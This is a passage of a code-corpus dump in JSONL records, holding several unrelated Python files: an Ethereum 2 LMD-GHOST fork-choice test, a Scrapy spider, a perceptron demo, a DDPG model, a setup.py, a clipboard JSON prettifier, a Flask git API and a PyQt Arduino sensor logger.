committees_at_slot = ()\n for committee, _, _ in iterate_committees_at_slot(\n state, target_slot, committees_per_slot, config\n ):\n committees_at_slot += (committee,)\n return tuple(\n random.sample(\n committees_at_slot, int((sampling_fraction * committees_per_slot))\n )\n )\n\n\ndef _attach_committee_to_block(block, committee_and_index):\n block._committee_data = committee_and_index\n\n\ndef _get_committee_from_block(block):\n return getattr(block, \"_committee_data\", None)\n\n\ndef _attach_attestation_to_block(block, attestation):\n block._attestation = attestation\n\n\ndef _get_attestation_from_block(block):\n return getattr(block, \"_attestation\", None)\n\n\ndef _attach_committees_to_block_tree(\n state, block_tree, committees_by_slot, config, forking_asymmetry\n):\n for level, committees in zip(\n _iter_block_tree_by_slot(block_tree), committees_by_slot\n ):\n block_count = len(level)\n partitions = partition(block_count, committees)\n for committee_index, (block, committee) in enumerate(\n zip(_iter_block_level_by_block(level), partitions)\n ):\n if forking_asymmetry:\n if random.choice([True, False]):\n # random drop out\n continue\n _attach_committee_to_block(block, (first(committee), committee_index))\n\n\n# TODO(ralexstokes) merge in w/ tools/builder\ndef _mk_attestation_for_block_with_committee(block, committee, committee_index, config):\n committee_count = len(committee)\n aggregation_bits = bitfield.get_empty_bitfield(committee_count)\n for index in range(committee_count):\n aggregation_bits = bitfield.set_voted(aggregation_bits, index)\n\n attestation = Attestation(\n aggregation_bits=aggregation_bits,\n data=AttestationData(\n slot=block.slot,\n index=committee_index,\n beacon_block_root=block.signing_root,\n target=Checkpoint(\n 
epoch=compute_epoch_at_slot(block.slot, config.SLOTS_PER_EPOCH)\n ),\n ),\n )\n return attestation\n\n\ndef _attach_attestations_to_block_tree_with_committees(block_tree, config):\n for block in _iter_block_tree_by_block(block_tree):\n committee_data = _get_committee_from_block(block)\n if not committee_data:\n # w/ asymmetry in forking we may need to skip this step\n continue\n committee, committee_index = committee_data\n attestation = _mk_attestation_for_block_with_committee(\n block, committee, committee_index, config\n )\n _attach_attestation_to_block(block, attestation)\n\n\ndef _score_block(block, store, state, config):\n return sum(\n _balance_for_validator(state, validator_index)\n for validator_index, target in store._get_attestation_targets()\n if store._get_ancestor(target, block.slot) == block\n ) + score_block_by_root(block)\n\n\ndef _build_score_index_from_decorated_block_tree(block_tree, store, state, config):\n return {\n block.signing_root: _score_block(block, store, state, config)\n for block in _iter_block_tree_by_block(block_tree)\n }\n\n\ndef _iter_attestation_by_validator_index(state, attestation, config):\n for index in get_attesting_indices(\n state, attestation.data, attestation.aggregation_bits, config\n ):\n yield index\n\n\nclass _store:\n \"\"\"\n Mock Store class.\n \"\"\"\n\n def __init__(self, state, root_block, block_tree, attestation_pool, config):\n self._state = state\n self._block_tree = block_tree\n self._attestation_pool = attestation_pool\n self._config = config\n self._latest_attestations = self._find_attestation_targets()\n self._block_index = {\n block.signing_root: block for block in _iter_block_tree_by_block(block_tree)\n }\n self._block_index[root_block.signing_root] = root_block\n self._blocks_by_parent_root = {\n block.parent_root: self._block_index[block.parent_root]\n for block in _iter_block_tree_by_block(block_tree)\n }\n\n def _find_attestation_targets(self):\n result = {}\n for _, attestation in self._attestation_pool:\n target_slot = attestation.data.slot\n for validator_index in _iter_attestation_by_validator_index(\n self._state, attestation, self._config\n ):\n if validator_index in result:\n existing = result[validator_index]\n existing_slot = existing.data.slot\n if existing_slot > target_slot:\n continue\n result[validator_index] = attestation\n return result\n\n def _get_attestation_targets(self):\n for index, target in self._latest_attestations.items():\n yield (index, self._block_index[target.data.beacon_block_root])\n\n def _get_parent_block(self, block):\n return self._blocks_by_parent_root[block.parent_root]\n\n def _get_ancestor(self, block, slot):\n if block.slot == slot:\n return block\n elif block.slot < slot:\n return None\n else:\n return self._get_ancestor(self._get_parent_block(block), slot)\n\n\n@pytest.mark.parametrize(\n (\"validator_count\",),\n [\n (8,), # low number of validators\n (128,), # medium number of validators\n (1024,), # high number of validators\n ],\n)\n@pytest.mark.parametrize(\n (\n # controls how many children a parent has\n \"forking_descriptor\",\n ),\n [\n ((1,),),\n ((2,),),\n ((3,),),\n ((1, 1),),\n ((2, 1),),\n ((3, 2),),\n ((1, 4),),\n ((1, 2, 1),),\n ],\n)\n@pytest.mark.parametrize(\n (\n # controls how children should be allocated to a given parent\n \"forking_asymmetry\",\n ),\n [\n # Asymmetry means we may deviate from the description in ``forking_descriptor``.\n (True,),\n # No asymmetry means every parent has\n # the number of children prescribed in ``forking_descriptor``.\n # => 
randomly drop some blocks from receiving attestations\n (False,),\n ],\n)\ndef test_lmd_ghost_fork_choice_scoring(\n sample_beacon_block_params,\n chaindb_at_genesis,\n # see note below on how this is used\n fork_choice_scoring,\n forking_descriptor,\n forking_asymmetry,\n genesis_state,\n empty_attestation_pool,\n config,\n):\n \"\"\"\n Given some blocks and some attestations, can we score them correctly?\n \"\"\"\n chain_db = chaindb_at_genesis\n root_block = chain_db.get_canonical_head(BeaconBlock)\n\n some_epoch = 3\n some_slot_offset = 10\n\n state = genesis_state.copy(\n slot=compute_start_slot_at_epoch(some_epoch, config.SLOTS_PER_EPOCH)\n + some_slot_offset,\n current_justified_checkpoint=Checkpoint(\n epoch=some_epoch, root=root_block.signing_root\n ),\n )\n assert some_epoch >= state.current_justified_checkpoint.epoch\n\n # NOTE: the attestations have to be aligned to the blocks which start from ``base_slot``.\n base_slot = compute_start_slot_at_epoch(some_epoch, config.SLOTS_PER_EPOCH) + 1\n block_tree = _build_block_tree(\n sample_beacon_block_params,\n root_block,\n base_slot,\n forking_descriptor,\n forking_asymmetry,\n config,\n )\n\n slot_count = len(forking_descriptor)\n committee_sampling_fraction = 1\n committees_by_slot = tuple(\n _get_committees(\n state, base_slot + slot_offset, config, committee_sampling_fraction\n )\n for slot_offset in range(slot_count)\n )\n\n _attach_committees_to_block_tree(\n state, block_tree, committees_by_slot, config, forking_asymmetry\n )\n\n _attach_attestations_to_block_tree_with_committees(block_tree, config)\n\n attestations = tuple(\n _get_attestation_from_block(block)\n for block in _iter_block_tree_by_block(block_tree)\n if _get_attestation_from_block(block)\n )\n\n attestation_pool = empty_attestation_pool\n for attestation in attestations:\n attestation_pool.add(attestation)\n\n store = _store(state, root_block, block_tree, attestation_pool, config)\n\n score_index = _build_score_index_from_decorated_block_tree(\n block_tree, store, state, config\n )\n\n for block in _iter_block_tree_by_block(block_tree):\n # NOTE: we use the ``fork_choice_scoring`` fixture, it doesn't matter for this test\n chain_db.persist_block(block, BeaconBlock, fork_choice_scoring)\n\n scoring_fn = lmd_ghost_scoring(\n chain_db, attestation_pool, state, config, BeaconBlock\n )\n\n for block in _iter_block_tree_by_block(block_tree):\n score = scoring_fn(block)\n expected_score = score_index[block.signing_root]\n assert score == expected_score\n", "sub_path": "tests/eth2/core/beacon/fork_choice/test_lmd_ghost.py", "file_name": "test_lmd_ghost.py", "file_ext": "py", "file_size_in_byte": 20512, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "eth2.beacon.committee_helpers.iterate_committees_at_epoch", "line_number": 39, "usage_type": "call"}, {"api_name": "eth2.beacon.types.attestation_data.AttestationData", "line_number": 46, "usage_type": "call"}, {"api_name": "eth2.beacon.types.checkpoints.Checkpoint", "line_number": 47, "usage_type": "call"}, {"api_name": "eth2._utils.bitfield.get_empty_bitfield", "line_number": 50, "usage_type": "call"}, {"api_name": "eth2._utils.bitfield", "line_number": 50, "usage_type": "name"}, {"api_name": "eth2._utils.bitfield.set_voted", "line_number": 52, "usage_type": "call"}, {"api_name": "eth2._utils.bitfield", "line_number": 52, "usage_type": "name"}, {"api_name": "eth_utils.to_dict", "line_number": 37, "usage_type": "name"}, {"api_name": 
"eth_utils.toolz.merge", "line_number": 66, "usage_type": "call"}, {"api_name": "eth_utils.toolz.second", "line_number": 73, "usage_type": "call"}, {"api_name": "eth2.beacon.types.attestations.Attestation", "line_number": 74, "usage_type": "call"}, {"api_name": "eth_utils.toolz.first", "line_number": 85, "usage_type": "name"}, {"api_name": "eth2.beacon.committee_helpers.iterate_committees_at_epoch", "line_number": 93, "usage_type": "call"}, {"api_name": "eth2.beacon.types.attestation_data.AttestationData", "line_number": 98, "usage_type": "call"}, {"api_name": "eth2.beacon.types.checkpoints.Checkpoint", "line_number": 99, "usage_type": "call"}, {"api_name": "eth2._utils.bitfield.get_empty_bitfield", "line_number": 102, "usage_type": "call"}, {"api_name": "eth2._utils.bitfield", "line_number": 102, "usage_type": "name"}, {"api_name": "eth2._utils.bitfield.set_voted", "line_number": 104, "usage_type": "call"}, {"api_name": "eth2._utils.bitfield", "line_number": 104, "usage_type": "name"}, {"api_name": "eth_utils.toolz.sliding_window", "line_number": 120, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 125, "usage_type": "call"}, {"api_name": "eth2.beacon.helpers.compute_epoch_at_slot", "line_number": 128, "usage_type": "call"}, {"api_name": "eth_utils.toolz.merge", "line_number": 134, "usage_type": "call"}, {"api_name": "eth2.beacon.committee_helpers.get_committee_count_per_slot_at_epoch", "line_number": 140, "usage_type": "call"}, {"api_name": "eth2.beacon.helpers.compute_start_slot_at_epoch", "line_number": 170, "usage_type": "call"}, {"api_name": "eth_utils.toolz.keyfilter", "line_number": 198, "usage_type": "call"}, {"api_name": "eth_utils.toolz.merge", "line_number": 213, "usage_type": "call"}, {"api_name": "eth_utils.toolz.keyfilter", "line_number": 217, "usage_type": "call"}, {"api_name": "eth_utils.toolz.merge_with", "line_number": 252, "usage_type": "call"}, {"api_name": "eth2.beacon.fork_choice.lmd_ghost.Store", "line_number": 270, "usage_type": "call"}, {"api_name": "eth2.beacon.types.blocks.BeaconBlock", "line_number": 270, "usage_type": "argument"}, {"api_name": "pytest.mark.parametrize", "line_number": 151, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 151, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 160, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 160, "usage_type": "attribute"}, {"api_name": "eth2.beacon.types.blocks.BeaconBlock", "line_number": 282, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 303, "usage_type": "call"}, {"api_name": "eth2.beacon.committee_helpers.get_committee_count_at_slot", "line_number": 331, "usage_type": "call"}, {"api_name": "eth2.beacon.committee_helpers.iterate_committees_at_slot", "line_number": 339, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 344, "usage_type": "call"}, {"api_name": "eth_utils.toolz.partition", "line_number": 373, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 378, "usage_type": "call"}, {"api_name": "eth_utils.toolz.first", "line_number": 381, "usage_type": "call"}, {"api_name": "eth2._utils.bitfield.get_empty_bitfield", "line_number": 387, "usage_type": "call"}, {"api_name": "eth2._utils.bitfield", "line_number": 387, "usage_type": "name"}, {"api_name": "eth2._utils.bitfield.set_voted", "line_number": 389, "usage_type": "call"}, {"api_name": "eth2._utils.bitfield", "line_number": 389, "usage_type": "name"}, {"api_name": 
"eth2.beacon.types.attestations.Attestation", "line_number": 391, "usage_type": "call"}, {"api_name": "eth2.beacon.types.attestation_data.AttestationData", "line_number": 393, "usage_type": "call"}, {"api_name": "eth2.beacon.types.checkpoints.Checkpoint", "line_number": 397, "usage_type": "call"}, {"api_name": "eth2.beacon.helpers.compute_epoch_at_slot", "line_number": 398, "usage_type": "call"}, {"api_name": "eth2.beacon.fork_choice.lmd_ghost._balance_for_validator", "line_number": 420, "usage_type": "call"}, {"api_name": "eth2.beacon.fork_choice.lmd_ghost.score_block_by_root", "line_number": 423, "usage_type": "call"}, {"api_name": "eth2.beacon.epoch_processing_helpers.get_attesting_indices", "line_number": 434, "usage_type": "call"}, {"api_name": "eth2.beacon.types.blocks.BeaconBlock", "line_number": 544, "usage_type": "argument"}, {"api_name": "eth2.beacon.helpers.compute_start_slot_at_epoch", "line_number": 550, "usage_type": "call"}, {"api_name": "eth2.beacon.types.checkpoints.Checkpoint", "line_number": 552, "usage_type": "call"}, {"api_name": "eth2.beacon.helpers.compute_start_slot_at_epoch", "line_number": 559, "usage_type": "call"}, {"api_name": "eth2.beacon.types.blocks.BeaconBlock", "line_number": 602, "usage_type": "argument"}, {"api_name": "eth2.beacon.fork_choice.lmd_ghost.lmd_ghost_scoring", "line_number": 604, "usage_type": "call"}, {"api_name": "eth2.beacon.types.blocks.BeaconBlock", "line_number": 605, "usage_type": "argument"}, {"api_name": "pytest.mark.parametrize", "line_number": 491, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 491, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 499, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 499, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 515, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 515, "usage_type": "attribute"}]} +{"seq_id": "294958513", "text": "#!/usr/bin/env python\n# @Time : 2018/8/8 上午11:17\n# @Author : SeaRobbersAndDuck\n# @Site : \n# @File : littlestarspider.py\n# @Software: PyCharm\n\nimport scrapy\nfrom littlestar.items import GamerankItem\nimport time\n\nclass Gamerank(scrapy.Spider):\n name = 'ggame'\n allowed_domains = '9game.cn'\n start_urls = []\n for i in range(1,5):\n url = 'http://www.9game.cn/xyrb/'\n url = url + str(i) + '_0/'\n start_urls.append(url)\n print(start_urls)\n\n def parse(self, response):\n item = GamerankItem()\n time.sleep(4)\n games = response.xpath('//tr')\n for each_game in games:\n print(each_game)\n\n", "sub_path": "littlestar/littlestar/spiders/littlestarspider.py", "file_name": "littlestarspider.py", "file_ext": "py", "file_size_in_byte": 668, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "scrapy.Spider", "line_number": 12, "usage_type": "attribute"}, {"api_name": "littlestar.items.GamerankItem", "line_number": 23, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "278812807", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport random\nfrom sklearn.linear_model import Perceptron\n\ndata = np.array([[0, 1], [0, 0], [1, 0], [1, 1]])\ntarget = np.array([0, 0, 0, 1])\np = Perceptron(max_iter=100)\np_out = p.fit(data, target)\n# print(p.coef_, p.intercept_)\n\ncolors = np.array(['k', 'r'])\nmarkers = np.array(['*', 'o'])\n\nfor data, target in zip(data, target):\n plt.scatter(data[0], data[1], s=100, 
c=colors[target], marker=markers[target])\n\ngrad = -p.coef_[0][0]/p.coef_[0][1]\nintercept = -p.intercept_/p.coef_[0][1]\n\nx_vals = np.linspace(0, 1)\ny_vals = grad*x_vals + intercept\nplt.plot(x_vals, y_vals)\nplt.show()\n\n", "sub_path": "perceptron_training.py", "file_name": "perceptron_training.py", "file_ext": "py", "file_size_in_byte": 640, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.array", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 7, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Perceptron", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}]} +{"seq_id": "330230566", "text": "import torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\n\nclass Value_Net(nn.Module): # Critic\n\tdef __init__(self, observation_dim, action_dim):\n\t\tsuper(Value_Net, self).__init__()\n\t\tself.fc1 = nn.Linear(observation_dim + action_dim, 256)\n\t\tself.fc2 = nn.Linear(256, 256)\n\t\tself.fc3 = nn.Linear(256, 1)\n\n\tdef forward(self, state, action):\n\t\tx = torch.cat((state, action), dim=1)\n\t\tx = F.relu(self.fc1(x))\n\t\tx = F.relu(self.fc2(x))\n\t\t\n\t\treturn self.fc3(x)\n\n\nclass Policy_Net(nn.Module): # Actor\n\tdef __init__(self, observation_dim, action_dim):\n\t\tsuper(Policy_Net, self).__init__()\n\t\tself.fc1 = nn.Linear(observation_dim, 256)\n\t\tself.fc2 = nn.Linear(256, 256)\n\t\tself.fc3 = nn.Linear(256, action_dim)\n\n\tdef forward(self, observation):\n\t\tx = F.relu(self.fc1(observation))\n\t\tx = F.relu(self.fc2(x))\n\t\tx = F.tanh(self.fc3(x))\n\t\t\n\t\treturn x\n\n\nclass DDPG(nn.Module):\n\tdef __init__(self, observation_dim, action_dim):\n\t\tsuper(DDPG, self).__init__()\n\t\tself.observation_dim = observation_dim\n\t\tself.action_dim = action_dim\n\n\t\tself.actor = Policy_Net(self.observation_dim, self.action_dim)\n\t\tself.critic = Value_Net(self.observation_dim, self.action_dim)\n\n\tdef forward(self, state):\n\t\taction = self.actor(state)\n\t\tvalue = self.critic(state, action)\n\t\treturn action, value", "sub_path": "DDPG/DDPG_Model.py", "file_name": "DDPG_Model.py", "file_ext": "py", "file_size_in_byte": 1275, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.nn.Module", "line_number": 6, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 6, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 11, 
"usage_type": "name"}, {"api_name": "torch.cat", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 21, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 26, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.nn.functional.tanh", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 36, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "360410437", "text": "#!/usr/bin/env python\n\nimport os\nimport sys\n\nfrom setuptools import find_packages, setup\n\nrequirements = [\"pyyaml\", \"numpy\"]\n\nwith open(\"README.rst\") as readme_file:\n readme = readme_file.read()\n\nwith open(\"HISTORY.rst\") as history_file:\n history = history_file.read().replace(\".. 
:changelog\", \"\")\n\n\ndoclink = \"\"\"\nDocumentation\n-------------\n\nA selection of small everyday tools.\n\nAt the moment includes a context handler, logging tool and a tool to standardize paths.\n\nPlease visit the Project Homepage: http://cosmo-docs.phys.ethz.ch/ekit for the Documenta tion.\"\"\"\n\nPACKAGE_PATH = os.path.abspath(os.path.join(__file__, os.pardir))\n\nsetup(\n name=\"ekit\",\n version=\"0.1.1\",\n description=\"Selection of small, general tools\",\n long_description=doclink,\n author=\"Dominik Zuercher\",\n author_email=\"dominikz@phys.ethz.ch\",\n url=\"https://cosmo-docs.phys.ethz.ch/ekit\",\n packages=find_packages(include=[\"ekit\"]),\n include_package_data=True,\n install_requires=requirements,\n license=\"MIT License\",\n zip_safe=False,\n keywords=\"ekit\",\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Science/Research\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Natural Language :: English\",\n \"Programming Language :: Python :: 3.7\",\n ],\n)\n", "sub_path": "pypi_install_script/ekit-0.1.1.tar/setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1375, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.abspath", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.pardir", "line_number": 27, "usage_type": "attribute"}, {"api_name": "setuptools.setup", "line_number": 29, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "85482845", "text": "#! 
/usr/bin/python\n\nimport sys\nimport json\nimport subprocess\n\n\ndef prettify_json(obj):\n obj = json.loads(obj)\n return json.dumps(obj, indent=3)\n\n\ndef clipboard(output):\n p = subprocess.Popen(['xsel', '-ib'], stdin=subprocess.PIPE)\n p.communicate(output)\n\n\nif __name__ == '__main__':\n data = subprocess.check_output('xsel')\n output = prettify_json(data)\n clipboard(output)\n", "sub_path": "keyboard_prettify_json.py", "file_name": "keyboard_prettify_json.py", "file_ext": "py", "file_size_in_byte": 393, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "json.loads", "line_number": 9, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 10, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 14, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 14, "usage_type": "attribute"}, {"api_name": "subprocess.check_output", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "270624209", "text": "#!/usr/bin/env python3\nfrom flask import Flask, request\n\nfrom items.items import items\nfrom items.init import git_init\nfrom items.info import info\n\napp = Flask(__name__)\n\nINIT_DEFAULT = ('useremail', 'username', 'production_releases',\n 'release_development','feature_branches','release_branches',\n 'hotfix_branches','support_branches','version_tag_prefix')\n\n@app.route(\"/api/init/git\", methods=['POST'])\ndef init():\n \"\"\"\n arguments:\n useremail='codevs_deck@codevs.cn'&\n username='codevs_deck'&\n production_releases='master'&\n release_development='develop'&\n feature_branches='feature/'&\n release_branches='release/'&\n hotfix_branches='hotfix/'&\n support_branches='support/'&\n version_tag_prefix=''\n \n \"\"\"\n req_id = request.json['ID']\n workdir = request.json['workdir']\n arguments = {}\n\n for i in request.json.keys():\n if i in INIT_DEFAULT:\n arguments[i] = request.json[i].strip()+'\\n'\n\n return git_init(req_id, workdir, **arguments)\n\n\n@app.route(\"/api/git/<command>\", methods=['POST'])\ndef git_command(command):\n req_id = request.json['ID']\n workdir = request.json['workdir']\n argument_str = request.json['argument_str']\n userinfo = request.json.get('userinfo','')\n\n return items(req_id, workdir, command, argument_str, userinfo)\n\n@app.route(\"/api/info/git/<workdir>\", methods=['GET'])\ndef git_info(workdir):\n return info(workdir)\n\n \n\n\nif __name__ == \"__main__\":\n app.run()\n", "sub_path": "flask/git_docker/git/deck_git.py", "file_name": "deck_git.py", "file_ext": "py", "file_size_in_byte": 1549, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 30, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.request.json.keys", "line_number": 33, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 33, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 33, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 35, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 35, "usage_type": "name"}, {"api_name": "items.init.git_init", "line_number": 37, "usage_type": "call"}, 
{"api_name": "flask.request.json", "line_number": 42, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 42, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 43, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 44, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 44, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 45, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 45, "usage_type": "name"}, {"api_name": "items.items.items", "line_number": 47, "usage_type": "call"}, {"api_name": "items.info.info", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "225946956", "text": "# -*- coding: utf-8 -*-\nimport sys\nfrom PyQt5 import QtGui, QtCore, QtWidgets\nfrom datetime import datetime\nimport time\nimport functools\nimport os\nimport errno\nimport json\nfrom tinydb import TinyDB, where\nfrom sensor import Arduino\n\nimport tools\n\n\nclass Thread(QtCore.QThread):\n # this object is referenced as self.thread from SystemTrayIcon\n date = None\n\n def __init__(self, config):\n QtCore.QThread.__init__(self)\n self.s1 = Arduino(config['port'])\n self.sensors = config['sensors']\n self.db_folders = config['db_folders']\n\n for db_folder in self.db_folders:\n self.make_sure_path_exists(db_folder)\n for k in self.sensors:\n self.make_sure_path_exists(db_folder + \"/\" + k + \"_json\")\n self.make_sure_path_exists(db_folder + \"/\" + k + \"_txt\")\n\n for k, d in self.sensors.items():\n d['on'] = False\n d['interval'] = 60\n d['last_measurement'] = 0\n\n self.update_db_date()\n\n def make_sure_path_exists(self, path):\n try:\n os.makedirs(path)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n\n def update_db_date(self):\n if self.date != self.get_current_date():\n self.date = self.get_current_date()\n for key in self.sensors:\n self.sensors[key]['dbs'] = []\n self.sensors[key]['txts'] = []\n for db_folder in self.db_folders:\n db_object = TinyDB(db_folder + key + \"_json/\" + key + \"_\" + self.date +\n \".json\", default_table='arduino', sort_keys=True, indent=4)\n self.sensors[key]['dbs'].append(db_object)\n txt_name = db_folder + key + \"_txt/\" + key + \"_\" + self.date + \".txt\"\n self.sensors[key]['txts'].append(txt_name)\n\n def get_current_date(self):\n date = datetime.now().strftime(\"%y-%m-%d\")\n return date\n\n def run(self):\n '''\n Main loop of the measuring thread.\n '''\n while True:\n for k in self.sensors:\n if self.sensors[k]['on']:\n if time.time() - self.sensors[k]['last_measurement'] > self.sensors[k]['interval']:\n self.get_measurement(k)\n self.sensors[k]['last_measurement'] = time.time()\n # Maximum measuring frequency\n time.sleep(1)\n\n def insert(self, sensor_key, reading):\n # TinyDB local storage\n for db in self.sensors[sensor_key]['dbs']:\n db.insert(reading)\n # TXT local storage\n for txt in self.sensors[sensor_key]['txts']:\n self.insert_txt(txt, sensor_key, reading)\n\n def insert_txt(self, fname, sensor_key, reading):\n if not os.path.isfile(fname):\n with open(fname, \"w\", encoding=\"utf-8\") as f:\n header = \"# \"\n header += '\\t'.join(reading.keys())\n header += \"\\n\"\n f.write(header)\n with open(fname, \"a\", encoding=\"utf-8\") as f:\n line = '\\t'.join(str(e) for e in reading.values())\n line += \"\\n\"\n f.write(line)\n\n def 
get_measurement(self, sensor_key):\n reading = self.s1.read(str.encode(self.sensors[sensor_key][\"key\"]))\n # print(reading)\n reading['stamp'] = int(time.time() * 1000)\n reading['date'] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n self.update_db_date()\n self.insert(sensor_key, reading)\n\n def set_interval(self, key, interval):\n '''\n Sets measuring interval.\n '''\n self.sensors[key]['interval'] = interval\n print(\"Interval sensoru `{}` nastaven na {}.\".format(\n self.sensors[key]['name'], tools.pretty_time(interval)))\n\n def turn(self, k, status):\n st = ['vypnut', 'zapnut']\n if self.sensors[k]['on'] != status:\n self.sensors[k]['on'] = status\n print(\"{} byl {}.\".format(self.sensors[k]['name'], st[status]))\n else:\n print(\"{} byl už {}, žádná změna.\".format(self.sensors[k]['name'], st[status]))\n", "sub_path": "src/thread.py", "file_name": "thread.py", "file_ext": "py", "file_size_in_byte": 4179, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PyQt5.QtCore.QThread", "line_number": 16, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 16, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QThread.__init__", "line_number": 21, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QThread", "line_number": 21, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 21, "usage_type": "name"}, {"api_name": "sensor.Arduino", "line_number": 22, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 41, "usage_type": "call"}, {"api_name": "errno.EEXIST", "line_number": 43, "usage_type": "attribute"}, {"api_name": "tinydb.TinyDB", "line_number": 53, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 60, "usage_type": "call"}, {"api_name": "datetime.datetime", 